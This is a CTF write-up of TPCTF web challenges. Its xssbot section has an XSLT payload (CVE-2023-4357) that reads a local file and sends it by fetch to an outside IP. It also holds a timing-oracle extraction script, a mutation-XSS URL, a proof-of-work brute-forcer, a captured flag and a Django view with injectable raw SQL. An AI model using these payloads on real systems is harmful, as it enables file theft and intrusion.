Preface
Five web challenges and not one of them is anything other than XSS. My verdict is.....
Caught mycoplasma while writing this, damn it. Didn't make it to N1, and 强网拟态 clashed with the provincial competition again. Ugh.
xssbot
CVE-2023-4357 (Chromium XSLT: local file read through the stylesheet's `document()`).
The bot has outbound network access, so the file content can simply be carried out to a listener. Note that the payload below puts `p.innerHTML` into the query string unencoded; if the file contained `&` or `#` the value would be cut short, so `encodeURIComponent` would be the safer choice.
```xml
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="?#"?>
<!DOCTYPE div [
  <!ENTITY passwd_p "file:///flag">
  <!ENTITY passwd_c SYSTEM "file:///flag">
  <!ENTITY sysini_p "file:///flag">
  <!ENTITY sysini_c SYSTEM "file:///flag">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:copy-of select="document('')"/>
    <body xmlns="http://www.w3.org/1999/xhtml">
      <div style="display:none">
        <p class="&passwd_p;">&passwd_c;</p>
        <p class="&sysini_p;">&sysini_c;</p>
      </div>
      <div style="width:40rem" id="r" />
      <script>
        document.querySelector('#r').innerHTML = `
        remote web url: <textarea style="width:100%;height:1rem">${location.href}</textarea><br/><br/>`;
        document.querySelectorAll('p').forEach(p => {
          //You can send p.innerHTML by POST.
          document.querySelector('#r').innerHTML += `
          local file path: <textarea style="width:100%;height:1rem">${ p.className }</textarea><br/>
          local file content:<textarea style="width:100%;height:6rem">${ p.innerHTML }</textarea><br/><br/>`;
          // The file content leaves in the query string of this request;
          // the listener's response does not matter.
          const apiUrl = 'http://8.130.24.188:6662?flag='+p.innerHTML;
          fetch(apiUrl)
            .then(response => {
              if (!response.ok) {
                throw new Error('Network response was not ok');
              }
              return response.json();
            })
        });
      </script>
    </body>
  </xsl:template>
</xsl:stylesheet>
```
xssbot but no Internet
The no-Internet version of the first challenge. My approach was simply to do blind extraction on top of the first challenge's payload. But blind extraction ends up slow, because every request needs one nc round trip, about five seconds... but I guessed the flag wouldn't be long, just short.
Blind extraction one hex digit at a time: a correct guess makes the page spin forever, and the bot's timeout error is the oracle.
```xml
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="?#"?>
<!DOCTYPE div [
  <!ENTITY passwd_p "file:///flag">
  <!ENTITY passwd_c SYSTEM "file:///flag">
  <!ENTITY sysini_p "file:///flag">
  <!ENTITY sysini_c SYSTEM "file:///flag">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:copy-of select="document('')"/>
    <body xmlns="http://www.w3.org/1999/xhtml">
      <div style="display:none">
        <p class="&passwd_p;">&passwd_c;</p>
        <p class="&sysini_p;">&sysini_c;</p>
      </div>
      <div style="width:40rem" id="r" />
      <script>
        const p=document.querySelector("p");
        // hex-encode the file content so every guess is one of 16 digits
        const flag=p.innerHTML.split("").map(c => c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
        // THEPOS / THEFLAG are filled in by the driver script for each guess
        if(flag.charAt(THEPOS)=='THEFLAG'){
          while(1){}   // hang the page: the bot times out and the service prints ERROR
        }
      </script>
    </body>
  </xsl:template>
</xsl:stylesheet>
```
```python
from pwn import *
import traceback

with open("./template.xml", "r") as file:
    template = file.read()


def test(flag):
    """Submit the payload with the last hex digit of `flag` as the guess for
    position len(flag)-1.  A correct guess hangs the bot (while(1)), which the
    service reports as ERROR; a wrong one finishes with 'Bye bye!'."""
    io = remote("202.112.238.82", 23379)
    try:
        io.sendline(b"a.xml")
        xml = template.replace("THEFLAG", flag[-1]).replace("THEPOS", str(len(flag) - 1))
        io.sendline(xml.encode())
        io.sendline(b"EOF")
        io.recvuntil(b"- Now browsing your website...")
        result = io.recvuntil([b"Bye bye!", b"ERROR"])
        if b"ERROR" in result:
            return True
        elif b"Bye bye!" in result:
            return False
        else:
            assert False, result
    finally:
        io.close()


def main():
    flag = "54504354467b"  # hex("TPCTF{")
    while 1:
        if flag.endswith("7d"):  # hex("}")
            print(flag)
            exit(0)
        try:
            # if no digit matches (flaky oracle) the while loop simply retries the position
            for char in '0123456789abcdef':
                local_flag = flag + char
                if test(local_flag):
                    flag = local_flag
                    print(flag)
                    break
        except KeyboardInterrupt:
            raise
        except Exception:
            traceback.print_exc()


main()
```
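To see the extraction loop converge without a live target, here is an added example (my own code, not part of the original writeup) that replaces the nc round trip with a constructed stand-in for the bot. `SimulatedBot` answers True where the real service printed ERROR (the page hung in `while(1)`) and False where it printed "Bye bye!"; the flag it guards is a made-up sample. The recovery loop is the same nibble-by-nibble search as the script above, with one difference: it only treats `7d` as the closing brace on a byte boundary, so a `7` ending one character and a `d` starting the next can never stop it early.

```python
# Added example: offline simulation of the timeout oracle used against the
# no-Internet xssbot.  The bot is a constructed stand-in, not the real service.

HEX_ALPHABET = "0123456789abcdef"


def flag_to_hex(flag: str) -> str:
    """Mirror the injected script: each character becomes two lowercase hex
    digits (charCodeAt(0).toString(16).padStart(2, "0"))."""
    return "".join(f"{ord(c):02x}" for c in flag)


class SimulatedBot:
    """Stand-in for the challenge service. `secret` is a constructed flag."""

    def __init__(self, secret: str):
        self._hex = flag_to_hex(secret)
        self.calls = 0  # on the real target each call was one nc round trip (~5 s)

    def __call__(self, pos: int, guess: str) -> bool:
        # Same test the payload performs: flag.charAt(THEPOS) == 'THEFLAG'
        self.calls += 1
        return pos < len(self._hex) and self._hex[pos] == guess


def recover_flag(oracle, known_prefix: str = "TPCTF{", max_chars: int = 64) -> str:
    """Recover the flag one hex digit at a time through a boolean oracle.

    oracle(pos, guess) must return True iff hex(flag)[pos] == guess.
    Stops at a byte-aligned '}' (0x7d).  Raises if no digit matches, which on
    a real target means the oracle answered unreliably and the position should
    be retried rather than skipped.
    """
    hex_flag = flag_to_hex(known_prefix)
    while len(hex_flag) < 2 * max_chars:
        pos = len(hex_flag)
        for digit in HEX_ALPHABET:
            if oracle(pos, digit):
                hex_flag += digit
                break
        else:
            raise RuntimeError(f"no hex digit matched at position {pos}")
        # Only look for '}' on a byte boundary so a nibble pair straddling two
        # characters is never mistaken for the closing brace.
        if len(hex_flag) % 2 == 0 and hex_flag[-2:] == "7d":
            break
    return bytes.fromhex(hex_flag).decode()


if __name__ == "__main__":
    bot = SimulatedBot("TPCTF{t3st_fl4g}")  # constructed sample flag
    print(recover_flag(bot), "recovered in", bot.calls, "oracle calls")
```

Each nibble costs at most 16 oracle calls, so a 16-character flag with a known 6-character prefix is at most 320 round trips; at roughly five seconds each that is the half-hour budget the writeup is betting against.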
walk off the earth
The rough idea has two parts:
- XSS through the note route
- Bypass the sha256 comparison on the visit route: find a suffix such that sha256(c5a5c0d64fab871c + ???) starts with seven zeros (the prefix value differs per connection; the script below uses the one from another run)
```python
from pwn import *
import hashlib
import string

base = 'abd3d4a91f15fbc0'


def test(suffix):
    """Proof-of-work check: sha256(base + suffix) must start with seven hex zeros."""
    data = base + suffix
    hash_value = hashlib.sha256(data.encode()).hexdigest()
    return hash_value.startswith('0000000')


# multi-process brute force over fixed-length (8) suffixes; returns the first hit
print(pwnlib.util.iters.mbruteforce(test, string.digits + string.ascii_letters + string.punctuation, 8, 'fixed'))
```
The flag is in res, and it must not get overwritten by res = "Bye bye!".
https://developer.mozilla.org/en-US/docs/Web/API/Document/DOMContentLoaded_event
DOMContentLoaded
does not wait for an img src,
but it does wait for a script src (a synchronous script blocks the parser).
So loading a script that takes more than 2000ms makes page.goto throw a timeout, and res keeps the flag.
/note?text=<form>+<math><mtext>+<%2Fform><form>+<mglyph>+<style><%2Fmath><script+src%3D%27https://app.requestly.io/delay/5000/www.baidu.com%27><%2Fscript>
TPCTF{W0w_Y0u_Bl3w_Up_th3_Pr1s0n!}
graphoid
I couldn't understand it at all. Ugh.
walk off the solar system
I also don't know how to get into the next catch. Ugh.
ezsqli
```python
from django.shortcuts import render
from django.db import connection
from django.http import HttpResponse, HttpRequest
from .models import AdminUser, Blog, QueryHelper


def index(request: HttpRequest):
    return HttpResponse('Welcome to TPCTF')


def debug(request: HttpRequest):
    if request.method != 'POST':
        return HttpResponse('Welcome to TPCTF')
    username = request.POST.get('username')
    if username != 'admin':
        return HttpResponse('you are not admin.')
    password = request.POST.get('password')
    # raw query built with % formatting: password goes straight into the SQL
    users: AdminUser = AdminUser.objects.raw("SELECT * FROM blog_adminuser WHERE username='%s' and password ='%s'" % (username, password))
    try:
        assert password == users[0].password
        q = QueryHelper(query="select flag from flag", debug=True, debug_sql="select sqlite_version()")
        response = q.run_debug()
        return HttpResponse(response)
    except:
        return HttpResponse('wrong password')


def search(request: HttpRequest):
    try:
        query_helper = QueryHelper("SELECT * FROM blog_blog WHERE id=%s", **request.GET.dict())
        result = query_helper.run(Blog)[0]
        return HttpResponse(result.content)
    except Exception as e:
        return HttpResponse('你来到了没有知识的荒原')  # "You have arrived at a wasteland without knowledge"
```
The main code is above: two routes, debug and search, both built with %s placeholders; still being tested.
The search route has no SQL injection; debug has string concatenation, but no way to see the query result. Try blind injection (sqlite).
I have no idea how to get past your SQL injection. Ugh. Lately just seeing SQL gives me a headache, so I didn't keep going on this one.....
Summary
Of the challenges in this contest, I think xssbot and the walk off the earth four-parter were decent, but the other two were a bit, a bit, a bit... weird!